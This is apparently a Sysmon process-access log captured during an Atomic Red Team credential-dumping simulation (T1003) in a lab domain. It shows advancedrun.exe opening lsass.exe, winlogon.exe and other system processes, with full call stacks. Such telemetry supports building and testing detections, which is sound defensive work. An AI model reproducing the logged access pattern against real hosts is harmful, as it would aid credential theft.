17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942637Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942636Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942635Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942633Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942632Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942631Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942630Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942629Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942627Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942626Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942625Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942624Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942623Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942621Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942620Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942619Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T10